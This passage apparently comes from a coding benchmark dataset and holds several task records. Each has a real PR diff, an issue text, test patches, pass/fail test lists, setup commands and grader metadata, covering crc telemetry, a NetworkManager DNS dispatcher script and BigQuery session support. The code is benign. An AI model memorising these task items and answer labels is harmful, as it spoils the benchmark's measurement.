configurations migrate cleanly and that the new validation does not reject legacy values. - Run the full CLI test suite to ensure all commands produce expected console output without the old output package. - Manually test `crc setup` to confirm the telemetry prompt appears, records the choice, and that subsequent telemetry uploads respect the recorded consent.
1,818
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index abc799f97..0eabde50c 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -60,7 +60,7 @@ func mockServer() (chan []byte, *httptest.Server) { return done, server } -func newTestConfig(value bool) (*crcConfig.Config, error) { +func newTestConfig(value string) (*crcConfig.Config, error) { storage := crcConfig.NewEmptyInMemoryStorage() config := crcConfig.New(storage) cmdConfig.RegisterSettings(config) @@ -80,7 +80,7 @@ func TestClientUploadWithConsent(t *testing.T) { require.NoError(t, err) defer os.RemoveAll(dir) - config, err := newTestConfig(true) + config, err := newTestConfig("yes") require.NoError(t, err) c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) @@ -113,7 +113,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { require.NoError(t, err) defer os.RemoveAll(dir) - config, err := newTestConfig(false) + config, err := newTestConfig("no") require.NoError(t, err) c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL)
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Function: newTestConfig(value string) Location: pkg/crc/segment/segment_test.go (test helper used by TestClientUploadWithConsent and TestClientUploadWithOutConsent) Inputs: <code>value</code> – a string expected to be either <code>"yes"</code> or <code>"no"</code>, which is stored as the telemetry consent value in the in‑memory configuration. Outputs: <code>(*crcConfig.Config, error)</code> – the created configuration object (with the <code>consent‑telemetry</code> setting set to the given string) and any error that occurred while building it. Description: Creates an in‑memory CRC configuration for tests, registers the command‑line settings, and pre‑populates the <code>ConsentTelemetry</code> key with the provided <code>"yes"</code>/<code>"no"</code> value so that the segment client can be exercised under both consent and non‑consent scenarios.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 19, "num_modified_lines": 67, "pr_author": "guillaumerose", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://developers.redhat.com/article/tool-data-collection" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests prompting the user for telemetry consent during `crc setup` and handling the response, which is clearly described with expected messages. The provided tests align with this behavior by checking consent handling using string values, and the code changes (config validation, input prompt, segment upload check) directly support the requirement without unrelated test regressions. No signals of B‑category problems are present, so the task is classified as solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
667a4164481ca9271b424d51775f75baed69243e
2021-01-06 11:34:15
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1819#" title="Author self-approved">cfergeau</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [cfergeau] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} -->
code-ready__crc-1819
diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index 36e7a13b2..1c2b96adf 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -5,6 +5,7 @@ import ( "io/ioutil" "os" "strings" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -175,13 +176,12 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { logging.Debugf("Running '%s'", fullCmd) - if err := input(cmd, args); err != nil { - if serr := segmentClient.Upload(fullCmd, err); serr != nil { - logging.Debugf("Cannot send data to telemetry: %v", serr) - } - return err + startTime := time.Now() + err := input(cmd, args) + if serr := segmentClient.Upload(fullCmd, time.Since(startTime), err); serr != nil { + logging.Debugf("Cannot send data to telemetry: %v", serr) } - return nil + return err } } diff --git a/pkg/crc/preflight/preflight_checks_network_linux.go b/pkg/crc/preflight/preflight_checks_network_linux.go index bc78d6802..ca22b3ea9 100644 --- a/pkg/crc/preflight/preflight_checks_network_linux.go +++ b/pkg/crc/preflight/preflight_checks_network_linux.go @@ -72,22 +72,27 @@ server=/crc.testing/192.168.130.11 dns=dnsmasq ` - crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") - crcNetworkManagerDispatcherConfig = `#!/bin/sh + crcNetworkManagerOldDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") + crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "99-crc.sh") + crcNetworkManagerDispatcherConfig = `#!/bin/sh # This is a NetworkManager dispatcher script to configure split DNS for # the 'crc' libvirt network. -# The corresponding crc bridge is recreated each time the system reboots, so -# it cannot be configured permanently through NetworkManager. -# Changing DNS settings with nmcli requires the connection to go down/up, -# so we directly make the change using resolvectl +# +# The corresponding crc bridge is not created through NetworkManager, so +# it cannot be configured permanently through NetworkManager. We make the +# change directly using resolvectl instead. +# +# NetworkManager will overwrite this resolvectl configuration every time a +# network connection goes up/down, so we run this script on each of these events +# to restore our settings. This is a NetworkManager bug which is fixed in +# version 1.26.6 by this commit: +# https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe export LC_ALL=C -if [ "$1" = crc ]; then - resolvectl domain "$1" ~testing - resolvectl dns "$1" 192.168.130.11 - resolvectl default-route "$1" false -fi +resolvectl domain crc ~testing +resolvectl dns crc 192.168.130.11 +resolvectl default-route crc false exit 0 ` @@ -266,6 +271,10 @@ func checkCrcNetworkManagerDispatcherFile() error { func fixCrcNetworkManagerDispatcherFile() error { logging.Debug("Fixing NetworkManager dispatcher configuration") + + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + err := fixNetworkManagerConfigFile(crcNetworkManagerDispatcherPath, crcNetworkManagerDispatcherConfig, 0755) if err != nil { return err @@ -276,6 +285,9 @@ func fixCrcNetworkManagerDispatcherFile() error { } func removeCrcNetworkManagerDispatcherFile() error { + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + return removeNetworkManagerConfigFile(crcNetworkManagerDispatcherPath) } diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 254dfb386..e9ac423c4 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -4,7 +4,9 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" + "time" "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -53,24 +55,35 @@ func (c *Client) Close() error { return c.segmentClient.Close() } -func (c *Client) Upload(action string, err error) error { +func (c *Client) Upload(action string, duration time.Duration, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits(). - Set("action", action). - Set("error", err.Error()) + if err := c.segmentClient.Enqueue(analytics.Identify{ + AnonymousId: anonymousID, + Traits: analytics.NewTraits(). + Set("os", runtime.GOOS), + }); err != nil { + return err + } + + properties := analytics.NewProperties(). + Set("success", err == nil). + Set("duration", duration.Milliseconds()) + if err != nil { + properties = properties.Set("error", err.Error()) + } - return c.segmentClient.Enqueue(analytics.Identify{ + return c.segmentClient.Enqueue(analytics.Track{ AnonymousId: anonymousID, - Traits: t, + Event: action, + Properties: properties, }) }
fedora33: Workaround NetworkManager bug with systemd-resolved crc DNS configuration on systems using systemd-resolved is done through a NetworkManager dispatcher file which gets run when the crc bridge is created by libvirt. This file then uses resolvectl to configure the bridge as the interface to use for resolving names in the .testing domain. However, NetworkManager will overwrite this resolvectl configuration every time a network connection goes up/down. This is a NetworkManager bug which is fixed in version 1.26.6 by this commit: https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe This commit changes the dispatcher script to run every time any network interface changes state so that we restore crc DNS configuration after NM overwrites it. This workaround can be removed in a few weeks/months once the NetworkManager package is upgraded in Fedora (I did not check if ubuntu is impacted). This fixes https://github.com/code-ready/crc/issues/1773 ## Testing Using a fedora 33 system with NetworkManager older than 1.26.6 1. after `crc setup`, `resolvectl domain` shows Link x (crc): ~testing 2. start/stop a NM connection with a search domain set (nmcli conn, nmcli conn show $conn |grep ipv4.dns-search, nmcli conn modify $conn ipv4.dns-search ~example.com, nmcli conn down $conn, nmcli conn up $conn) - just stopping/starting the VPN does the tric on my system 3. check `resolvectl domain` again - before this patch, `~testing` is gone, after this patch `~testing` is still present
**Title** Improve NetworkManager DNS dispatcher handling and enrich telemetry reporting **Problem** - On systems where NetworkManager overwrites `resolvectl` settings, the CRC split‑DNS configuration is lost after any network connection change. - Telemetry uploads previously did not capture command execution duration nor correctly distinguish successful from failed actions. **Root Cause** - The dispatcher script was tied to a single event and located in a legacy path, so it was not re‑executed when NetworkManager altered DNS. - The telemetry client used an `Identify` call without duration or success information and ignored upload errors. **Fix / Expected Behavior** - Relocate the dispatcher script to the proper NetworkManager dispatcher directory and ensure it runs on every interface state change, restoring the CRC DNS settings automatically. - Remove the obsolete script location from previous releases. - Simplify the script to always apply the required `resolvectl` configuration. - Extend the telemetry API to accept execution duration, report success status, include OS information, and use a `Track` event. - Propagate any upload errors back to the caller and log failures only at debug level. **Risk & Validation** - Verify that the new dispatcher script restores CRC DNS after any NetworkManager up/down event without affecting other connections. - Confirm that telemetry events contain `duration`, `success`, and appropriate error details, and that they are sent reliably. - Test on a Fedora 33 system with an older NetworkManager version and run the CRC setup flow, checking that the `~testing` domain remains present after toggling a network connection.
1,819
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index cdf4faa22..abc799f97 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -8,7 +8,9 @@ import ( "net/http/httptest" "os" "path/filepath" + "runtime" "testing" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -22,8 +24,11 @@ type segmentResponse struct { AnonymousID string `json:"anonymousId"` MessageID string `json:"messageId"` Traits struct { - Error string `json:"error"` + OS string `json:"os"` } `json:"traits"` + Properties struct { + Error string `json:"error"` + } `json:"properties"` Type string `json:"type"` } `json:"batch"` Context struct { @@ -81,14 +86,17 @@ func TestClientUploadWithConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Minute, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { case x := <-body: s := segmentResponse{} require.NoError(t, json.Unmarshal(x, &s)) - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Batch[0].Type, "identify") + require.Equal(t, s.Batch[0].Traits.OS, runtime.GOOS) + require.Equal(t, s.Batch[1].Type, "track") + require.Equal(t, s.Batch[1].Properties.Error, "an error occurred") require.Equal(t, s.Context.App.Name, "crc") require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: @@ -111,7 +119,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Second, errors.New("an error occurred"))) require.NoError(t, c.Close()) select {
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: Client.Upload(self, action string, duration time.Duration, err error) error Location: pkg/crc/segment/segment.go Inputs: - action (string) – name of the telemetry event (e.g., “start”). - duration (time.Duration) – elapsed time of the command execution; sent as duration (ms) in the event properties. - err (error) – error returned by the command; nil means success. When non‑nil its Error() string is added to the event properties. Outputs: - error  – returns nil on success, or any error produced while preparing the payload or enqueuing it to Segment (including consent‑disabled short‑circuit). The function always returns after attempting to send telemetry, never propagates the original err parameter. Description: Sends a telemetry event to Segment. It first checks the telemetry consent flag, then builds an identify message with the OS trait and a track message with the given action, duration (in milliseconds) and optional error details, and enqueues them via the Segment client. Used by the CLI wrapper to report command execution results.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 3, "num_modified_lines": 49, "pr_author": "cfergeau", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "regression_bug" ], "reason": null, "reasoning": "The issue requests a workaround for a NetworkManager bug by moving the dispatcher script and cleaning up old files. The provided tests, however, exercise telemetry changes (new Upload signature, OS trait, duration) that are not mentioned in the issue, indicating a mismatch between the issue intent and test expectations. This mismatch is a classic case of test‑suite coupling, where fixing the issue would require unrelated changes to pass the tests, so the primary classification is B1.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect the segment.Upload function to accept a duration argument and to send Identify and Track events with OS and duration properties, which are not described in the issue.", "Tests assert presence of runtime.GOOS and duration fields in the payload, unrelated to the NetworkManager dispatcher fix." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6861b30cc43f17876894476e92305f2eb8ccfbff
2021-09-15 04:29:22
googleapis__google-cloud-go-4754
diff --git a/bigquery/job.go b/bigquery/job.go index 657d338e4b..510cdda054 100644 --- a/bigquery/job.go +++ b/bigquery/job.go @@ -375,6 +375,9 @@ type JobStatistics struct { // TransactionInfo indicates the transaction ID associated with the job, if any. TransactionInfo *TransactionInfo + + // SessionInfo contains information about the session if this job is part of one. + SessionInfo *SessionInfo } // Statistics is one of ExtractStatistics, LoadStatistics or QueryStatistics. @@ -884,6 +887,7 @@ func (j *Job) setStatistics(s *bq.JobStatistics, c *Client) { ScriptStatistics: bqToScriptStatistics(s.ScriptStatistics), ReservationUsage: bqToReservationUsage(s.ReservationUsage), TransactionInfo: bqToTransactionInfo(s.TransactionInfo), + SessionInfo: bqToSessionInfo(s.SessionInfo), } switch { case s.Extract != nil: @@ -1002,3 +1006,26 @@ func bqToTransactionInfo(in *bq.TransactionInfo) *TransactionInfo { TransactionID: in.TransactionId, } } + +// SessionInfo contains information about a session associated with a job. +type SessionInfo struct { + SessionID string +} + +func (s *SessionInfo) toBQ() *bq.SessionInfo { + if s == nil { + return nil + } + return &bq.SessionInfo{ + SessionId: s.SessionID, + } +} + +func bqToSessionInfo(in *bq.SessionInfo) *SessionInfo { + if in == nil { + return nil + } + return &SessionInfo{ + SessionID: in.SessionId, + } +} diff --git a/bigquery/query.go b/bigquery/query.go index 3ce018e942..b64ae06211 100644 --- a/bigquery/query.go +++ b/bigquery/query.go @@ -132,6 +132,12 @@ type QueryConfig struct { // Allows the schema of the destination table to be updated as a side effect of // the query job. SchemaUpdateOptions []string + + // CreateSession will trigger creation of a new session when true. + CreateSession bool + + // ConnectionProperties are optional key-values settings. + ConnectionProperties []*ConnectionProperty } func (qc *QueryConfig) toBQ() (*bq.JobConfiguration, error) { @@ -147,6 +153,7 @@ func (qc *QueryConfig) toBQ() (*bq.JobConfiguration, error) { Clustering: qc.Clustering.toBQ(), DestinationEncryptionConfiguration: qc.DestinationEncryptionConfig.toBQ(), SchemaUpdateOptions: qc.SchemaUpdateOptions, + CreateSession: qc.CreateSession, } if len(qc.TableDefinitions) > 0 { qconf.TableDefinitions = make(map[string]bq.ExternalDataConfiguration) @@ -195,6 +202,13 @@ func (qc *QueryConfig) toBQ() (*bq.JobConfiguration, error) { } qconf.QueryParameters = append(qconf.QueryParameters, qp) } + if len(qc.ConnectionProperties) > 0 { + bqcp := make([]*bq.ConnectionProperty, len(qc.ConnectionProperties)) + for k, v := range qc.ConnectionProperties { + bqcp[k] = v.toBQ() + } + qconf.ConnectionProperties = bqcp + } return &bq.JobConfiguration{ Labels: qc.Labels, DryRun: qc.DryRun, @@ -219,6 +233,7 @@ func bqToQueryConfig(q *bq.JobConfiguration, c *Client) (*QueryConfig, error) { Clustering: bqToClustering(qq.Clustering), DestinationEncryptionConfig: bqToEncryptionConfig(qq.DestinationEncryptionConfiguration), SchemaUpdateOptions: qq.SchemaUpdateOptions, + CreateSession: qq.CreateSession, } qc.UseStandardSQL = !qc.UseLegacySQL @@ -255,6 +270,13 @@ func bqToQueryConfig(q *bq.JobConfiguration, c *Client) (*QueryConfig, error) { } qc.Parameters = append(qc.Parameters, p) } + if len(qq.ConnectionProperties) > 0 { + props := make([]*ConnectionProperty, len(qq.ConnectionProperties)) + for k, v := range qq.ConnectionProperties { + props[k] = bqToConnectionProperty(v) + } + qc.ConnectionProperties = props + } return qc, nil } @@ -402,6 +424,7 @@ func (q *Query) probeFastPath() (*bq.QueryRequest, error) { pfalse := false qRequest := &bq.QueryRequest{ Query: q.QueryConfig.Q, + CreateSession: q.CreateSession, Location: q.Location, UseLegacySql: &pfalse, MaximumBytesBilled: q.QueryConfig.MaxBytesBilled, @@ -427,3 +450,31 @@ func (q *Query) probeFastPath() (*bq.QueryRequest, error) { } return qRequest, nil } + +// ConnectionProperty represents a single key and value pair that can be sent alongside a query request. +type ConnectionProperty struct { + // Name of the connection property to set. + Key string + // Value of the connection property. + Value string +} + +func (cp *ConnectionProperty) toBQ() *bq.ConnectionProperty { + if cp == nil { + return nil + } + return &bq.ConnectionProperty{ + Key: cp.Key, + Value: cp.Value, + } +} + +func bqToConnectionProperty(in *bq.ConnectionProperty) *ConnectionProperty { + if in == nil { + return nil + } + return &ConnectionProperty{ + Key: in.Key, + Value: in.Value, + } +}
feat(bigquery): add session and connection support Adds: * CreateSession to Query config * ConnectionProperties to specify connection keys/values in Query config * SessionInfo in JobStatistics to record session stats Also contains some minor test refactoring to make it easier to test query execution.
**Title** Add BigQuery session creation and connection property support to query configuration and job statistics **Problem** Clients could not request a new session for a query nor specify custom connection key‑value settings. Additionally, job statistics did not expose any information about the session a job belonged to, limiting observability. **Root Cause** The query configuration and job‑statistics data models omitted fields required for session control and connection properties, so the API never transmitted or returned this information. **Fix / Expected Behavior** - Query configuration now accepts a flag to create a session and a list of connection key‑value pairs. - Session creation flag is included in the fast‑path request sent to BigQuery. - Job statistics surface session identifiers when a job is part of a session. - Internal conversion logic maps these new fields to and from the underlying BigQuery protobuf structures. - New types representing connection properties and session information are provided for client use. **Risk & Validation** - Verify that existing query workflows continue to work unchanged when the new fields are omitted. - Add tests that a query with the session flag set creates a session and that connection properties are correctly round‑tripped. - Perform integration checks to ensure the session identifier appears in job statistics for jobs executed within a session.
4,754
googleapis/google-cloud-go
diff --git a/bigquery/integration_test.go b/bigquery/integration_test.go index 2526392b37..de9b2a5847 100644 --- a/bigquery/integration_test.go +++ b/bigquery/integration_test.go @@ -479,7 +479,7 @@ func TestIntegration_SnapshotAndRestore(t *testing.T) { FROM UNNEST(GENERATE_ARRAY(0,999)) `, qualified) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatalf("couldn't instantiate base table: %v", err) } @@ -872,7 +872,7 @@ func TestIntegration_DatasetUpdateAccess(t *testing.T) { sql := fmt.Sprintf(` CREATE FUNCTION `+"`%s`"+`(x INT64) AS (x * 3);`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) @@ -1288,7 +1288,7 @@ func TestIntegration_RoutineStoredProcedure(t *testing.T) { END`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) @@ -2014,7 +2014,7 @@ func TestIntegration_DML(t *testing.T) { ('b', [1], STRUCT<BOOL>(FALSE)), ('c', [2], STRUCT<BOOL>(TRUE))`, table.DatasetID, table.TableID) - stats, err := runQueryJob(ctx, sql) + _, stats, err := runQuerySQL(ctx, sql) if err != nil { t.Fatal(err) } @@ -2036,12 +2036,18 @@ func TestIntegration_DML(t *testing.T) { } } +// runQuerySQL runs arbitrary SQL text. +func runQuerySQL(ctx context.Context, sql string) (*JobStatistics, *QueryStatistics, error) { + return runQueryJob(ctx, client.Query(sql)) +} + // runQueryJob is useful for running queries where no row data is returned (DDL/DML). -func runQueryJob(ctx context.Context, sql string) (*QueryStatistics, error) { - var stats *QueryStatistics +func runQueryJob(ctx context.Context, q *Query) (*JobStatistics, *QueryStatistics, error) { + var jobStats *JobStatistics + var queryStats *QueryStatistics var err error err = internal.Retry(ctx, gax.Backoff{}, func() (stop bool, err error) { - job, err := client.Query(sql).Run(ctx) + job, err := q.Run(ctx) if err != nil { if e, ok := err.(*googleapi.Error); ok && e.Code < 500 { return true, err // fail on 4xx @@ -2057,13 +2063,14 @@ func runQueryJob(ctx context.Context, sql string) (*QueryStatistics, error) { } status := job.LastStatus() if status.Statistics != nil { + jobStats = status.Statistics if qStats, ok := status.Statistics.Details.(*QueryStatistics); ok { - stats = qStats + queryStats = qStats } } return true, nil }) - return stats, err + return jobStats, queryStats, err } func TestIntegration_TimeTypes(t *testing.T) { @@ -2103,7 +2110,7 @@ func TestIntegration_TimeTypes(t *testing.T) { "VALUES ('%s', '%s', '%s', '%s')", table.DatasetID, table.TableID, d, CivilTimeString(tm), CivilDateTimeString(dtm), ts.Format("2006-01-02 15:04:05")) - if _, err := runQueryJob(ctx, query); err != nil { + if _, _, err := runQuerySQL(ctx, query); err != nil { t.Fatal(err) } wantRows = append(wantRows, wantRows[0]) @@ -2275,6 +2282,44 @@ func TestIntegration_QueryExternalHivePartitioning(t *testing.T) { checkReadAndTotalRows(t, "HiveQuery", it, [][]Value{{int64(50)}}) } +func TestIntegration_QuerySessionSupport(t *testing.T) { + if client == nil { + t.Skip("Integration tests skipped") + } + ctx := context.Background() + + q := client.Query("CREATE TEMPORARY TABLE temptable AS SELECT 17 as foo") + q.CreateSession = true + jobStats, _, err := runQueryJob(ctx, q) + if err != nil { + t.Fatalf("error running CREATE TEMPORARY TABLE: %v", err) + } + if jobStats.SessionInfo == nil { + t.Fatalf("expected session info, was nil") + } + sessionID := jobStats.SessionInfo.SessionID + if len(sessionID) == 0 { + t.Errorf("expected non-empty sessionID") + } + + q2 := client.Query("SELECT * FROM temptable") + q2.ConnectionProperties = []*ConnectionProperty{ + {Key: "session_id", Value: sessionID}, + } + jobStats, _, err = runQueryJob(ctx, q2) + if err != nil { + t.Errorf("error running SELECT: %v", err) + } + if jobStats.SessionInfo == nil { + t.Fatalf("expected sessionInfo in second query, was nil") + } + got := jobStats.SessionInfo.SessionID + if got != sessionID { + t.Errorf("second query mismatched session ID, got %s want %s", got, sessionID) + } + +} + func TestIntegration_QueryParameters(t *testing.T) { if client == nil { t.Skip("Integration tests skipped") @@ -2560,7 +2605,7 @@ func TestIntegration_ExtractExternal(t *testing.T) { sql := fmt.Sprintf(`INSERT %s.%s (name, num) VALUES ('a', 1), ('b', 2), ('c', 3)`, table.DatasetID, table.TableID) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } // Extract to a GCS object as CSV. @@ -2986,7 +3031,7 @@ func TestIntegration_MaterializedViewLifecycle(t *testing.T) { FROM UNNEST(GENERATE_ARRAY(0,999)) `, qualified) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { 